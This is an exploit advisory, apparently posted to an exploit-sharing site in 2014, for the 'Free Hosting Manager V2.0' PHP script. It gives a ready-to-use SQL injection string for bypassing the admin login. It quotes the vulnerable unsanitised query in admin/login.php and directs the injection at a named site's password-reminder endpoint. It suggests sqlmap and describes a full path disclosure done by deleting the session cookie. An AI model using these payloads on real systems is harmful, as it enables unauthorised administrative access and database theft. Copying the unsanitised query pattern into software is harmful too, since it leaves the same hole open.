facebook facebook twitter rss

Free Hosting Manager V2.0 sql injection (post) & Full Path Disclosure

Author: hamza killer , Published: 04-03-2014
#########################################################################################
# Free Hosting Manager V2.0 sql injection (post)& baypass admin & Full Path Disclosure #
# Author : hamza killer #
# E-mail : hlyzidi@gmail.com #
# GoogleDork: -_- !!! #
# Vendor :http://www.fhm-script.com/ #
# Thx TO : sec4ever members & sec4all &aircrack-ng #
########################################################################################
bayapss admin by (aircrack -ng)
=============
just type in user:
' or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1-- -.

SQl injetion (post method):
=========================
in:
admin/login.php
:
if ($_GET['do'] == 'send') {
$email = $_POST['email'];
$timestamp = strtotime("now");
$ip = $_SERVER['REMOTE_ADDR'];
$adminemails2="SELECT * FROM adminusers WHERE email='$email'";
$adminemails=mysql_query($adminemails2);

EXPLOIT :
webqth.com/admin/login.php?act=remind
POST:
email=[inject her ]
exploit it manual or use sqlmap
=========================
Full Path Disclosure
====================
webqth.com/admin/login.php
use any headr editor tools to delete Cookie: PHPSESSID=
look :
http://im79.gulfup.com/F36BS.png
=====================
=====================

Like us on Facebook :